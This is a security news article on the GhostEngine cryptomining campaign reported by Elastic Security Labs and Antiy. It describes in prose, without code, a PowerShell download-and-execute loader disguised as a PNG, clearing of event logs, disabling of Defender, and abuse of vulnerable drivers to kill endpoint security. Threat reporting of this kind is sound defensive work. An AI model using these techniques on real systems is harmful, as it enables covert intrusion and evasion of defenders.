New Crypto Mining Menace GhostEngine Uses Vulnerable Drivers to Evade Detection

An intrusion set named 'REF4578' has been identified, deploying a malicious payload known as GhostEngine to mine cryptocurrency using XMRig. This discovery, made by researchers from Elastic Security Labs and Antiy, is particularly notable for its strategy of leveraging vulnerable drivers to disable security defenses. The campaign aggressively targets systems that lack regular monitoring or updates, though the specific scope regarding geographic or industry targeting was not detailed in the reports. This campaign is active, with an example intrusion cited in Elastic Security's analysis occurring on May 6, 2024.

The intrusion commences with the execution of 'Tiworker.exe', a file masquerading as a legitimate Windows component. It starts with the command prompt (cmd.exe /c), which then initiates the use of PowerShell's IEX (Invoke-Expression) to download a PNG file. This file, in reality, is a PowerShell script named 'get.png', acting as the primary loader for the GhostEngine malware. Elastic researchers observed that GhostEngine's main purpose is to manipulate the system to facilitate uninterrupted crypto mining. Its operation first clears out any potential remnants from previous infections and adjusts system configurations to weaken security defenses. Notably, it deletes specific files and scheduled tasks, including Microsoft Assist Job, System Help Center Job, SystemFlushDns, and SystemFlashDnsSrv. GhostEngine then proceeds to disable critical Windows Defender features and clears numerous Windows event log channels such as Application, Security, Setup, System, and more, to cover its tracks.

To ensure persistence, GhostEngine creates scheduled tasks like 'OneDriveCloudSync' to run every 20 minutes using msdtc and other tasks to continuously download and execute malicious scripts. Additional actions include terminating processes such as curl.exe, further allowing the operation to run without competition from any previous infections. It creates or modifies drivers to help with this process. Drivers observed to have been used include aswArPots.sys (an Avast driver) to terminate processes and IObitUnlockers.sys to disable EDR software, enhancing its stealth and evasion capabilities. "Once the vulnerable drivers are loaded, detection opportunities decrease significantly, and organizations must find compromised endpoints that stop transmitting logs to their SIEM," Elastic researchers explain.

The GhostEngine campaign is an operation aimed at using infected machines to mine cryptocurrency, primarily Monero, using the XMRig miner. Elastic Security and Antiy reports highlight the campaign's complexity and the importance of monitoring for unusual PowerShell usage, network traffic to known mining pools, and unexpected changes made by vulnerable drivers. Organizations are advised to watch for and block the creation of scheduled tasks and driver manipulations associated with GhostEngine. Additionally, updating and patching systems to close off the vulnerabilities exploited by this campaign is crucial for protection against such threats.